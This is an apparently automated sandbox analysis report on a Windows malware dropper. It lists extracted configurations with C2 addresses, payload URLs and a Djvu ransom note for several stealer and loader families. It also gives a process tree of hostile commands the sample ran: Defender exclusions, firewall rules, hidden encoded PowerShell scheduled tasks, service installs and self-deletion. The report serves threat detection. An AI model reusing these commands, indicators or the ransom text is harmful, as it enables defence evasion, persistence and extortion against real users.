Analysis
-
max time kernel
39s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
13-03-2022 19:59
General
-
Target
e52fd5cbaf9a6cc09af9f5e48b33447a785f75a9e12b25007c7ec3e5d396cb3b.exe
-
Size
9.1MB
-
MD5
7582f474177a7985d44bc6151f74b780
-
SHA1
cda5d03aacdcedf7f078b718d16ea4bb62f5ec00
-
SHA256
e52fd5cbaf9a6cc09af9f5e48b33447a785f75a9e12b25007c7ec3e5d396cb3b
-
SHA512
b569bd881ee6525b1fa00a60e76598802e459ea5167bef4db9888121de081d7d7b6d05395d755bfd608482d9859df28a0a5c5ee4a765ec75b15a88aa351b231b
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.fcektsy.top/
Extracted
vidar
39.9
933
https://prophefliloc.tumblr.com/
-
profile_id
933
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Extracted
raccoon
1.7.3
92be0387873e54dd629b9bfa972c3a9a88e6726c
-
url4cnc
https://t.me/gishsunsetman
Extracted
redline
ruzki000
86.107.197.196:63065
-
auth_value
80fac7f67bd38aa709bbeef7a44ccb47
Extracted
redline
pizzadlyashekera
65.108.101.231:14648
-
auth_value
7d6b3cb15fc835e113d8c22bd7cfe2b4
Extracted
redline
ruzki12_03
176.122.23.55:11768
-
auth_value
c51ddc8008e8581a01cec6e8291c5530
Extracted
vidar
50.7
937
https://ruhr.social/@sam9al
https://koyu.space/@samsa2l
-
profile_id
937
Extracted
redline
ruz876
185.215.113.7:5186
-
auth_value
4750f6742a496bbe74a981d51e7680ad
Extracted
redline
Installs
94.23.1.92:12857
-
auth_value
c8e146507a5c0004dfcc77a7c5f15bc2
Extracted
redline
@ywqmre
185.215.113.24:15994
-
auth_value
5a482aa0be2b5e01649fe7a3ce943422
Extracted
djvu
http://fuyt.org/test3/get.php
-
extension
.xcbg
-
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
-
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn
Signatures
-
Detected Djvu ransomware 4 IoCs
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 2 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Raccoon Stealer Payload 3 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 10 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Vidar Stealer 4 IoCs
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 16 IoCs
-
Modifies Windows Firewall 1 TTPs
-
UPX packed file 5 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 18 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 4 IoCs
-
Enumerates processes with tasklist 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies registry class 1 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 53 IoCs
-
Suspicious use of FindShellTrayWindow 3 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\e52fd5cbaf9a6cc09af9f5e48b33447a785f75a9e12b25007c7ec3e5d396cb3b.exe"C:\Users\Admin\AppData\Local\Temp\e52fd5cbaf9a6cc09af9f5e48b33447a785f75a9e12b25007c7ec3e5d396cb3b.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij72⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffbfed946f8,0x7ffbfed94708,0x7ffbfed947183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,4438385082168326739,15700954138081693603,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,4438385082168326739,15700954138081693603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,4438385082168326739,15700954138081693603,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4438385082168326739,15700954138081693603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4438385082168326739,15700954138081693603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2116,4438385082168326739,15700954138081693603,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4596 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4438385082168326739,15700954138081693603,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,4438385082168326739,15700954138081693603,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,4438385082168326739,15700954138081693603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6336 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ff6cde95460,0x7ff6cde95470,0x7ff6cde954804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,4438385082168326739,15700954138081693603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6336 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,4438385082168326739,15700954138081693603,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5168 /prefetch:23⤵
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /94-944⤵
-
C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"C:\Users\Admin\AppData\Local\Temp\Install_Files.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\Vxil6JWFKbrx9ED9wJoHc8Gh.exe"C:\Users\Admin\Documents\Vxil6JWFKbrx9ED9wJoHc8Gh.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\efc71437-7d66-4c9b-a82f-385c1f7ea121.exe"C:\Users\Admin\AppData\Local\Temp\efc71437-7d66-4c9b-a82f-385c1f7ea121.exe"4⤵
-
C:\Users\Admin\Documents\htgA4phzTdqegtO2KTsCXOmg.exe"C:\Users\Admin\Documents\htgA4phzTdqegtO2KTsCXOmg.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif4⤵
-
C:\Windows\SysWOW64\cmd.execmd5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"6⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"6⤵
-
C:\Users\Admin\Documents\he1q9mbdRicARFzfQJrbZjJk.exe"C:\Users\Admin\Documents\he1q9mbdRicARFzfQJrbZjJk.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
-
C:\Users\Admin\Documents\t48RtUGsYmqllvdg4rtyIq8l.exe"C:\Users\Admin\Documents\t48RtUGsYmqllvdg4rtyIq8l.exe"3⤵
-
C:\Users\Admin\Documents\SEWwBxZSAWV3KBlVVNtHEcCi.exe"C:\Users\Admin\Documents\SEWwBxZSAWV3KBlVVNtHEcCi.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 6004⤵
- Program crash
-
C:\Users\Admin\Documents\9QpbfVeYz0MFvvyOsL2WYW7B.exe"C:\Users\Admin\Documents\9QpbfVeYz0MFvvyOsL2WYW7B.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
-
C:\Users\Admin\Documents\uJwb7t6Vr9aK4cmsNowjc3nQ.exe"C:\Users\Admin\Documents\uJwb7t6Vr9aK4cmsNowjc3nQ.exe"3⤵
-
C:\Users\Admin\Documents\C7ePb5aqzFXggFoWneSYeQjE.exe"C:\Users\Admin\Documents\C7ePb5aqzFXggFoWneSYeQjE.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\CQsVW8HVLcgvurlmsBEENL_p.exe"C:\Users\Admin\Pictures\Adobe Films\CQsVW8HVLcgvurlmsBEENL_p.exe"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\Tm8Bt8OUvy4sk0czbSZOWeQZ.exe"C:\Users\Admin\Documents\Tm8Bt8OUvy4sk0czbSZOWeQZ.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Tm8Bt8OUvy4sk0czbSZOWeQZ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\Tm8Bt8OUvy4sk0czbSZOWeQZ.exe" & del C:\ProgramData\*.dll & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Tm8Bt8OUvy4sk0czbSZOWeQZ.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\YUXKWRIV6RY8LfVS2Ms1NzkK.exe"C:\Users\Admin\Documents\YUXKWRIV6RY8LfVS2Ms1NzkK.exe"3⤵
-
C:\Users\Admin\Documents\Syc5svzMH9ceZ3TkZm8qOV3P.exe"C:\Users\Admin\Documents\Syc5svzMH9ceZ3TkZm8qOV3P.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 454⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 455⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\6Rj8FNBe7uQouN1G4wnjAGxP.exe"C:\Users\Admin\Documents\6Rj8FNBe7uQouN1G4wnjAGxP.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
-
C:\Users\Admin\Documents\tlNGFb3ot9C7Jpo2Gvgoyzxk.exe"C:\Users\Admin\Documents\tlNGFb3ot9C7Jpo2Gvgoyzxk.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
-
C:\Users\Admin\Documents\F5EHcPK2v_fjG0SOvNYIEQJn.exe"C:\Users\Admin\Documents\F5EHcPK2v_fjG0SOvNYIEQJn.exe"3⤵
-
C:\Users\Admin\Documents\gzq52VSNkIp_QYmpF5pFKnzH.exe"C:\Users\Admin\Documents\gzq52VSNkIp_QYmpF5pFKnzH.exe"3⤵
-
C:\Users\Admin\Documents\gzq52VSNkIp_QYmpF5pFKnzH.exe"C:\Users\Admin\Documents\gzq52VSNkIp_QYmpF5pFKnzH.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 5645⤵
- Program crash
-
C:\Users\Admin\Documents\NeucOr7Lyc6NLzhqXjJBHplb.exe"C:\Users\Admin\Documents\NeucOr7Lyc6NLzhqXjJBHplb.exe"3⤵
-
C:\Users\Admin\Documents\AO0M3ub0iNlwSTTIp7rh2KJ3.exe"C:\Users\Admin\Documents\AO0M3ub0iNlwSTTIp7rh2KJ3.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 8364⤵
- Program crash
-
C:\Users\Admin\Documents\sxsffgCU86fqbWBR9ujeuhx8.exe"C:\Users\Admin\Documents\sxsffgCU86fqbWBR9ujeuhx8.exe"3⤵
-
C:\Users\Admin\Documents\JzzFG0MjPsZzDOmwk1QigKV2.exe"C:\Users\Admin\Documents\JzzFG0MjPsZzDOmwk1QigKV2.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS48E8.tmp\Install.exe.\Install.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS7B14.tmp\Install.exe.\Install.exe /S /site_id "525403"5⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZwafZNHo" /SC once /ST 06:37:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZwafZNHo"6⤵
-
C:\Users\Admin\Documents\O2Tt5RP4T63MSHEo3Ub5Kvx7.exe"C:\Users\Admin\Documents\O2Tt5RP4T63MSHEo3Ub5Kvx7.exe"3⤵
-
C:\Users\Admin\Documents\f2ssZQSOsnDxxmCmaffeEHMv.exe"C:\Users\Admin\Documents\f2ssZQSOsnDxxmCmaffeEHMv.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vjkmotgj.exe" C:\Windows\SysWOW64\vccsrgfn\4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config vccsrgfn binPath= "C:\Windows\SysWOW64\vccsrgfn\vjkmotgj.exe /d\"C:\Users\Admin\Documents\f2ssZQSOsnDxxmCmaffeEHMv.exe\""4⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start vccsrgfn4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7764.bat" "4⤵
-
C:\Users\Admin\Documents\TVPrYXs_91XGV3vIWQvhJfew.exe"C:\Users\Admin\Documents\TVPrYXs_91XGV3vIWQvhJfew.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"C:\Users\Admin\AppData\Local\Temp\jamesdirect.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jamesdirect.exeC:\Users\Admin\AppData\Local\Temp\jamesdirect.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 4964⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Complete.exe"C:\Users\Admin\AppData\Local\Temp\Complete.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\QylsESTTIvdtENOMDxw4NhEY.exe"C:\Users\Admin\Documents\QylsESTTIvdtENOMDxw4NhEY.exe"3⤵
-
C:\Users\Admin\AppData\Roaming\program5214\program5214.exe"C:\Users\Admin\AppData\Roaming\program5214\program5214.exe"4⤵
-
C:\Users\Admin\Documents\EotVSFuSyHkmuUfOOhVoao8u.exe"C:\Users\Admin\Documents\EotVSFuSyHkmuUfOOhVoao8u.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
-
C:\Users\Admin\Documents\RysjhUX5AU06azG_t0c_C_az.exe"C:\Users\Admin\Documents\RysjhUX5AU06azG_t0c_C_az.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5152 -s 6244⤵
- Program crash
-
